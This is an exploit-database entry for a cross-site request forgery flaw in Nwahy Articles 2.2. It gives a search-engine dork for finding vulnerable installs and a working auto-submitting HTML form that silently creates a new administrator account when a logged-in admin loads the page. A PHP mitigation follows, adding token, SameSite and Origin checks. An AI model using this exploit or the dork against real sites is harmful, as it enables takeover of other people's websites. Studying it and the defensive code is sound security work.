Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)

EDB-ID: 19927
CVE:
Author: DaOne
Type: webapps
Platform: PHP
Date: 2012-07-18


##########################################
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Date: 18-7-2012
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################

[#] ~[ Exploit ]~

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>

##########################################
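
[#] ~[ Mitigation sketch ]~

The form above carries only the account fields and no per-session secret, which is why a page on another origin can submit it with the administrator's cookies. The following is an added example, not code from Nwahy Articles or from the exploit author: a server-side guard for a handler like admincp/user.php?action=insert, assuming PHP 7.3+ and a hidden form field named csrf_token (the function names and the field name are hypothetical).

```php
<?php
// Added example: hypothetical CSRF guard for an admin handler such as
// admincp/user.php?action=insert. Names are illustrative assumptions and
// are not taken from the Nwahy Articles code base.

// SameSite=Lax keeps the session cookie off cross-site POSTs (PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One random token per session; print it into every admin form as
// <input type="hidden" name="csrf_token" value="...">.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the POST body carries the session's token. A form hosted
// on another origin cannot read the token, so its submission fails here.
function csrf_request_is_valid(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Secondary check: if the browser sent an Origin header, its host must
// match the Host header (port stripped; host-only comparison).
function origin_is_same_site(array $server): bool
{
    if (empty($server['HTTP_ORIGIN'])) {
        return true; // header absent: the token check still applies
    }
    $origin = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
    $host   = preg_replace('/:\d+$/', '', $server['HTTP_HOST'] ?? '');
    return is_string($origin) && $host !== '' && strcasecmp($origin, $host) === 0;
}

if (($_GET['action'] ?? '') === 'insert') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !origin_is_same_site($_SERVER)
        || !csrf_request_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // The existing account-creation logic (username, password, email,
    // site, name, groubtype) runs only after all three checks pass.
}
```

The same guard belongs on every state-changing admincp action, with csrf_token() called when each form is rendered.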